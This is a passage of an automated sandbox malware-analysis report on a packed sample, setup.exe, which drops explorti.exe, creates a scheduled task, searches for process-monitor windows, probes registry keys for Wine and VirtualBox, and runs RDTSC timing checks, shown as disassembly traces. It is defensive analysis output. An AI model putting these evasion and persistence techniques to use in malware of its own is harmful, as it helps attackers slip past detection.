                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: setup.exeStatic file information: File size 1909760 > 1048576
                    Source: setup.exeStatic PE information: Raw size of usoriijt is bigger than: 0x100000 < 0x1a0c00

                    Data Obfuscation

                    barindex
                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\Desktop\setup.exeUnpacked PE file: 0.2.setup.exe.3c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeUnpacked PE file: 1.2.explorti.exe.f50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeUnpacked PE file: 2.2.explorti.exe.f50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeUnpacked PE file: 6.2.explorti.exe.f50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW;
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: explorti.exe.0.drStatic PE information: real checksum: 0x1d3ae7 should be: 0x1d959a
                    Source: setup.exeStatic PE information: real checksum: 0x1d3ae7 should be: 0x1d959a
                    Source: setup.exeStatic PE information: section name:
                    Source: setup.exeStatic PE information: section name: .idata
                    Source: setup.exeStatic PE information: section name:
                    Source: setup.exeStatic PE information: section name: usoriijt
                    Source: setup.exeStatic PE information: section name: ymfuwjgb
                    Source: setup.exeStatic PE information: section name: .taggant
                    Source: explorti.exe.0.drStatic PE information: section name:
                    Source: explorti.exe.0.drStatic PE information: section name: .idata
                    Source: explorti.exe.0.drStatic PE information: section name:
                    Source: explorti.exe.0.drStatic PE information: section name: usoriijt
                    Source: explorti.exe.0.drStatic PE information: section name: ymfuwjgb
                    Source: explorti.exe.0.drStatic PE information: section name: .taggant
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00F6D84C push ecx; ret 6_2_00F6D85F
                    Source: setup.exeStatic PE information: section name: entropy: 7.983026486073879
                    Source: setup.exeStatic PE information: section name: usoriijt entropy: 7.952894618410208
                    Source: explorti.exe.0.drStatic PE information: section name: entropy: 7.983026486073879
                    Source: explorti.exe.0.drStatic PE information: section name: usoriijt entropy: 7.952894618410208
                    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeJump to dropped file

                    Boot Survival

                    barindex
                    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                    Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Windows\Tasks\explorti.jobJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Tries to detect sandboxes / dynamic malware analysis system (registry check)
                    Source: C:\Users\user\Desktop\setup.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Tries to detect virtualization through RDTSC time measurements
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 42F434 second address: 42F438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 42F438 second address: 42F43E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B3639 second address: 5B363F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B363F second address: 5B3649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B3D5F second address: 5B3D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B3EDE second address: 5B3F1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC16945A283h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007FC16945A29Dh 0x00000011 jmp 00007FC16945A27Dh 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FC16945A27Eh 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B58C1 second address: 5B594E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edx, dword ptr [ebp+122D2C6Bh] 0x0000000e push 00000000h 0x00000010 mov dword ptr [ebp+122D180Ah], ecx 0x00000016 push 1CF5C958h 0x0000001b push edi 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007FC169461A9Ah 0x00000024 popad 0x00000025 pop edi 0x00000026 xor dword ptr [esp], 1CF5C9D8h 0x0000002d xor edi, dword ptr [ebp+122D2C93h] 0x00000033 push 00000003h 0x00000035 pushad 0x00000036 mov ebx, dword ptr [ebp+122D2A7Fh] 0x0000003c mov edi, dword ptr [ebp+122D2BEBh] 0x00000042 popad 0x00000043 push 00000000h 0x00000045 mov edi, dword ptr [ebp+122D2BBBh] 0x0000004b mov edi, dword ptr [ebp+122D2BEBh] 0x00000051 push 00000003h 0x00000053 push 00000000h 0x00000055 push eax 0x00000056 call 00007FC169461A98h 0x0000005b pop eax 0x0000005c mov dword ptr [esp+04h], eax 0x00000060 add dword ptr [esp+04h], 00000018h 0x00000068 inc eax 0x00000069 push eax 0x0000006a ret 0x0000006b pop eax 0x0000006c ret 0x0000006d mov edx, dword ptr [ebp+122D1BD9h] 0x00000073 call 00007FC169461A99h 0x00000078 push eax 0x00000079 push edx 0x0000007a push ecx 0x0000007b pushad 0x0000007c popad 0x0000007d pop ecx 0x0000007e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B594E second address: 5B5962 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 js 00007FC16945A276h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B5962 second address: 5B5966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B5AC9 second address: 5B5B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jg 00007FC16945A276h 0x0000000e popad 0x0000000f popad 0x00000010 xor dword ptr [esp], 599FCCE4h 0x00000017 jmp 00007FC16945A27Ah 0x0000001c push 00000003h 0x0000001e mov edx, dword ptr [ebp+122D2C23h] 0x00000024 sub edi, 305AD351h 0x0000002a push 00000000h 0x0000002c add dword ptr [ebp+122D1D3Dh], edx 0x00000032 push 00000003h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007FC16945A278h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e mov dx, cx 0x00000051 sub esi, 1320830Ch 0x00000057 push ACA5E9A0h 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B5B3B second address: 5B5B52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B5B52 second address: 5B5BA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 135A1660h 0x00000010 mov cx, si 0x00000013 lea ebx, dword ptr [ebp+1245A78Fh] 0x00000019 je 00007FC16945A27Ch 0x0000001f sbb ecx, 2208CF27h 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 jc 00007FC16945A276h 0x0000002f jmp 00007FC16945A289h 0x00000034 popad 0x00000035 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B5BA5 second address: 5B5BC0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007FC169461A96h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007FC169461A9Ch 0x00000015 jnp 00007FC169461A96h 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B5C63 second address: 5B5D1C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC16945A278h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f xor cx, 1527h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 mov dword ptr [ebp+122D2877h], eax 0x0000001d pop ecx 0x0000001e push 9E482409h 0x00000023 pushad 0x00000024 jmp 00007FC16945A283h 0x00000029 pushad 0x0000002a jmp 00007FC16945A280h 0x0000002f push ecx 0x00000030 pop ecx 0x00000031 popad 0x00000032 popad 0x00000033 add dword ptr [esp], 61B7DC77h 0x0000003a jp 00007FC16945A277h 0x00000040 stc 0x00000041 push 00000003h 0x00000043 push 00000000h 0x00000045 sub dword ptr [ebp+122D288Bh], esi 0x0000004b push 00000003h 0x0000004d push 00000000h 0x0000004f push edi 0x00000050 call 00007FC16945A278h 0x00000055 pop edi 0x00000056 mov dword ptr [esp+04h], edi 0x0000005a add dword ptr [esp+04h], 00000014h 0x00000062 inc edi 0x00000063 push edi 0x00000064 ret 0x00000065 pop edi 0x00000066 ret 0x00000067 call 00007FC16945A287h 0x0000006c sub dword ptr [ebp+122D1BD9h], esi 0x00000072 pop ecx 0x00000073 jmp 00007FC16945A27Bh 0x00000078 call 00007FC16945A279h 0x0000007d pushad 0x0000007e push eax 0x0000007f push edx 0x00000080 push ecx 0x00000081 pop ecx 0x00000082 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B5DE9 second address: 5B5DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5C83A6 second address: 5C83AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5C83AA second address: 5C83C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5A2C6D second address: 5A2C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FC16945A284h 0x0000000a pop esi 0x0000000b push eax 0x0000000c je 00007FC16945A278h 0x00000012 push eax 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D474E second address: 5D4752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D4752 second address: 5D4770 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC16945A289h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D4770 second address: 5D4785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007FC169461A98h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D4785 second address: 5D4791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnp 00007FC16945A276h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D4791 second address: 5D4795 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D4795 second address: 5D47A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jne 00007FC16945A276h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D47A7 second address: 5D47AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D4B91 second address: 5D4B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D4EA7 second address: 5D4EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D501E second address: 5D5073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC16945A284h 0x0000000a pushad 0x0000000b jmp 00007FC16945A27Ah 0x00000010 jmp 00007FC16945A282h 0x00000015 jmp 00007FC16945A289h 0x0000001a popad 0x0000001b popad 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D5073 second address: 5D5079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D5208 second address: 5D520C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D520C second address: 5D5210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D5210 second address: 5D522C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC16945A27Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FC16945A27Bh 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D537E second address: 5D538C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461A9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D538C second address: 5D5396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FC16945A276h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D5396 second address: 5D53B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 ja 00007FC169461A96h 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D53B3 second address: 5D53B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D53B8 second address: 5D53BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D53BE second address: 5D53C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D53C4 second address: 5D53C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D5D35 second address: 5D5D3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D5D3C second address: 5D5D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC169461AA2h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007FC169461AB4h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D5FD9 second address: 5D5FDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D5FDF second address: 5D5FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D5FE3 second address: 5D6003 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC16945A276h 0x00000008 jmp 00007FC16945A286h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D6003 second address: 5D6062 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FC169461AAEh 0x00000011 jmp 00007FC169461AA2h 0x00000016 jnl 00007FC169461A96h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC169461AA2h 0x00000023 jmp 00007FC169461AA3h 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D6062 second address: 5D6068 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D62CB second address: 5D62D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D62D1 second address: 5D62F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007FC16945A285h 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D88E7 second address: 5D88EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D88EB second address: 5D88F5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC16945A276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D88F5 second address: 5D88FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FC169461A96h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D88FF second address: 5D891C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC16945A27Fh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D8A10 second address: 5D8A24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC169461A96h 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D8A24 second address: 5D8A28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D8A28 second address: 5D8A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
